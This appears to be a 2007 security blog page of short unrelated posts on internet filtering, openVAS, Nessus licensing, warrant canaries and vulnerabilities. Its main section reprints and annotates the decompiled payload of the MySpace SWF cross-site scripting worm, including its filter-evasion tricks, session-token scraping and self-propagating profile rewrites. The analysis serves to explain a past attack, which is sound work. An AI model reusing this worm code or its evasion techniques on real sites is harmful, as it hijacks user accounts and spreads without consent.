Internet Filtering: Psiphon

Legal perspective on Internet Filtering from John Palfrey.

More on Psiphon

Psiphon is a censorship circumvention solution allowing users to access blocked sites in countries where the Internet is censored. Psiphon turns a regular home computer into a personal, encrypted server capable of retrieving and displaying web pages anywhere.

Internet Filtering: Chinese Filtering

Paper by Berkman’s J Zittrain on Chinese Filtering (warn: PDF)!

/whois jzittrain

Jonathan Zittrain – Berkman Center for Internet & Society
Jonathan Zittrain is a co-founder of HLS’s Berkman Center for Internet & Society and served as its first executive director from 1997-2000.

  • Control of digital property & content
  • Cryptography
  • Electronic privacy
  • Internet governance
  • Technology in education

Subject Areas for Supervising Written Work

  • Cyberlaw
  • Intellectual Property
  • Torts
  • Trademark

Subject Areas for Accepting Press Inquiries

  • Cryptography
  • Cyberlaw
  • Electronic commerce
  • Internet governance
  • Privacy


  • Yale University B.S. 1991, Cognitive Science and Artificial Intelligence
  • Harvard University John F. Kennedy School of Government M.P.A. 1995
  • Harvard Law School J.D. 1995


  • Lecturer on Law, 1997
  • Faculty Co-Director, Berkman Center for Internet and Society, 2000
  • Assistant Professor of Law, 2000
  • Jack N. and Lillian R. Berkman Assistant Professor for Entrepreneurial Legal Studies, 2001
  • Jack N. and Lillian R. Berkman Visiting Professor for Entrepreneurial Legal Studies, 2005
  • Chair, Internet Governance and Regulation, Oxford University, 2005

Security Review: openVAS

For more information:
from the bug logs:
There seems to me a consistant misuse of autoconf “localstatedir” variable. It is traditionally seen that localstatedir be $prefix/var if not supplied. In the following example from there are two issues. One being that if $localstate dir was $prefix/var then this would create $prefix/var/lib/nesuss. And the second being that is broken. If in this case the auth type is “pass” and MD5 is not present, it will make an auth password in an entirely different tree then if it did have MD5

Plug in count seems low or maybe I’m reading this wrong. Check out the nikto plugin.

The SSH DSA fingerprint is: 08:e9:69:cb:d6:42:9f:24:7d:40:de:12:ee:9e:92:23. The SSH RSA fingerprint is: 48:5f:a5:1c:7e:1c:b4:ef:53:b9:08:49:2d:c0:cb:1b.

openVAS 2007

Date: Mon, 9 Apr 2007 09:50:04 -0400
From: “Jon D”
Subject: Giving Nessus Reports to clients — Licensing, Legal, etc
To:  nessus at

Content-Type: text/plain; charset=”iso-8859-1″

I’ve heard of PenTesters giving a Nessus scan report to the client as part
of their final report.
I read through the nessus licensing agreement, and I didn’t say where it
said it’s not allowed.

Is this legal?
Also, is it legal to copy text from the nessus scan for a report?

Secrecy and Search and Seizures

Also called Sneak and Peeks the law enforcement community is sometimes permitted to search a persons place or things without telling them. In certain cases, such as library records or your off site data storage provider, the LE agent will issue a gag order so no one will know they were searched. One of these SSPs (storage service provider) has an interesting “canary” to help their users know when privacy has been violated.
The idea is simple. They sign a notice (cryptographically) with a snippet of text from a news site to validate the timestamp stating no government agents have made a search against any users data. If the message is not updated then something has gone wrong.

There is an obvious weakness which even they acknowledge. “Signing the declaration makes it impossible for a third party to produce arbitrary declarations, it does not prevent them from using force to coerce to produce false declarations.”]

2007 Myspace Hack Archive

archived just in case from]

How the myspace SWF hack worked

First note: I DID NOT MAKE THE HACK. I simply downloaded the .swf’s, decompiled them, looked at the actionscript, worked out what it did, found the Javascript that it uses, and tidied it up & commented it. I’ve probably got some bits wrong, feel free to contact me and I’ll update this page

When you visited an already infected page, there was an SWF embedded (“redirect.swf”) which contained the actionscript:

getURL(“”, “_self”);

Which is pretty self explanatory – it opened the blog URL which you got redirected to.

On the blog url which you got redirected to, there was another SWF embedded, called “retrievecookie.swf”. This contained:

getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');\'GET\',\'\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\'
\')!=-1)||(sc.indexOf(\'-XXX\')!=-1)){var n=sc.indexOf(\'
\');if(n==-1)n=sc.indexOf(\'-XXX\');sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};" + "eval(sc);}};" + "x.send(null);", "");

Which looks pretty obfuscated, however, when you space it out and add comments:

//this translates in the browser to: "javascript:"
//which myspace really should have blocked now.
var x = new ActiveXObject(\'Msxml2.XMLHTTP\');
// loads a new xmlHTTP object, sets it as var "x"\'GET\',\'\',true);
// This opens yet another blog post, at the URL above. The text of the URL is below
x.onreadystatechange = function()
// when the readystate of the xmlHTTP object changes:
if (x.readyState==4)
// once the state changes to complete (it goes from 0 to 4, iirc)
var pg = x.responseText;
// the code it got from the page
var sc = pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));
// loads into "sc" the contents of the response text from the place where
// the end of "BX-" (that's the +3) is first encountered up until it finds the start of
// "-EX", this is all the nasty JS.
while ( (sc.indexOf(\'
\')!=-1) || (sc.indexOf(\'-XXX\')!=-1) )
// while "sc" (the code) doesn't contain "
" or "-XXX" then:
var n=sc.indexOf(\'
// n is the start of where it finds "
" in "sc"
if (n==-1)
// if it cant find "
, then make n where it can find "-XXX"

// thist bit next was really quite clever, it manages to keep the > closing bracket for
// the embed tag, which it needs, and creates the embed tag by removing
// XXX's and leaving the final character!
sc = sc.substring(0,n)+sc.substring(n+5,sc.length);
// sc is now from the start, to n.
// then add on to sc the bit from n+5 to the end of sc,
// essentially, this cuts out the crap from the blog post it pull.
// the crap was in there in the first place to get past myspace's filters, I presume.
// this iterates through and removes the -XXX's from the blog post
" + "eval(sc);
// evaluate "sc" - this is what does it all.
} // end of readystate==4 "if"
}; //end of function
" //closing the quote from the SWF getURL() function
// adds on sending "null" to the xmlHTTP object.
", ""
// no target, so it just executes.
);// end of SWF getURL function.

In essence, it pulls a blog post from somewhere else on myspace, and evaluates the code that it contains.

This is the post:

BX-var msg='-XXXX
XE-XXXXM-XXXXB-XXXXE-XXXXD-XXXX src="">BY SPAIRLKAIFS';function paramsToString(AV){ var N=new String(); var O=0; for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){ Q=Q.replace('+', '%2B')}while(Q.indexOf('&')!=-1){ Q=Q.replace('&', '%26')}N+=P+'='+Q;O++ } return N};function getToken(page){ var start = page.indexOf('Mytoken='); token = page.substring(start+8, start+8+36); return token;};function getHashCode(page){ var start = page.indexOf('name="hash" value="'); hash = page.substring(start+19, start+19+216); return hash;};var xmlht-XXXXtp = x;var post = new Array();post['submit']='Preview';post['interest']=msg;post['interestLabel']='aboutme';var postsz = paramsToString(post); var token = getToken(xmlhttp.responseText);xmlhttp = new ActiveXObject('Msxml2.XMLHTTP');'POST', ''+token, true);xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');xmlhttp.setRequestHeader('Content-Length', postsz.length);ev-XXXXal('xmlhttp.onreadys-XXXXtatechange=editReady;');xmlhttp.send(postsz);function editReady(){if (xmlhttp.readyState==4){post = new Array();post['submit']='Submit';post['hash']=getHashCode(xmlhttp.responseText);post['interest']=msg;post['interestLabel']='aboutme';postsz = paramsToString(post); token = getToken(xmlhttp.responseText); xmlhttp = new ActiveXObject('Msxml2.XMLHTTP');'POST', ''+token, true);xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');xmlhttp.setRequestHeader('Content-Length', postsz.length);xmlhttp.send(postsz);}};-EX

Tidied up (and -XXX’s, etc) removed + commented:

var msg='<EMBED src="">BY SPAIRLKAIFS';
// the message itself.
function paramsToString (AV)
var N=new String();
var O=0;
for (var P in AV)
if (O>0)
// if it's not the first iteration, add "&" to the value, as to seperate the values.

var Q=escape(AV[P]);

while (Q.indexOf('+')!=-1)
Q=Q.replace('+', '%2B')
//replaec "+" with "%2B" - url encoding basically
while (Q.indexOf('&')!=-1)
Q=Q.replace('&', '%26')
// same again, except for "&".
N+= P + '=' + Q;
return N
// this turns a list of parameters in an array into a URL encoding string.

function getToken (page)
var start = page.indexOf('Mytoken=');
token = page.substring(start+8, start+8+36);
return token;
// gets your token, since you're on myspace already, your token is (unfortunately) in the URL.. oops.

function getHashCode (page)
var start = page.indexOf('name="hash" value="');
hash = page.substring(start+19, start+19+216);
return hash;
// gets your hash code, which is supposed to be a security measure
// again, since you're on - it's in the URL. Nice one myspace.

var xmlhttp = x;
var post = new Array();
// loads the payload (the "msg" var), and other bits into an array called "post"
var postsz = paramsToString(post);
// from the functione arlier, turns the "post" array into a string.
var token = getToken(xmlhttp.responseText);
// gets your token
xmlhttp = new ActiveXObject('Msxml2.XMLHTTP');
// new xmlHTTp object.'POST', ''+token,true);
// opens the profile interest modifcation .. bit through a xmlHTTP object.

xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
// sends a HTTP header, which is that it's about to send a url encoded form.
xmlhttp.setRequestHeader('Content-Length', postsz.length);
// evaluates the function below when the readystate changes.
// sends it - which modifies your profile to include the contents of the msg var
function editReady()
if (xmlhttp.readyState==4)
post = new Array();
postsz = paramsToString(post);
token = getToken(xmlhttp.responseText);
xmlhttp = new ActiveXObject('Msxml2.XMLHTTP');'POST',''+token,true); xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlhttp.setRequestHeader('Content-Length', postsz.length);

Which is then all evaluated by the first load of JS.

So there you have it.

Email me if you like:

PS: To the author, that’s some clever code, nice one – I probably shouldn’t be congratulating you, but hey.

Decrypting Wireless Packets


If I’ve used kismet to create a dump file (full packet capture) with WEP encrypted data and then later learn the WEP key, how can I can I apply this key (and BSID) to decrypt the data?

Top 2007 Symantec Vulnerabilities

MAY 25, 2006 | EEye Digital Security revealed this afternoon a software vulnerability inside Symantec’s Anti-Virus Corporate Edition 10.0.

The vulnerability warning, posted on the vendor’s Upcoming Advisories page, requires no user intervention and could be used to create a worm. A Symantec representative told Dark Reading that eEye notified Symantec of the problem today and it is investigating the issue.

Thinking like the enemy?

Years in the vulnerability management space has taught me that companies can protect themselves by thinking like the attackers. This message seems to be broad in application and a recent anti-terrorism expert voiced the same thought.

Yet this story has the anti virus industry up in arms for a consumer protection agency doing just that. The list of those opposed is impressive but obviously biased. The people who signed all have a financial stake in the game. I’m more interested in what those who are unbiased think of the situation.

Dec 2007 Top 10 Infected Autonomous System Blocks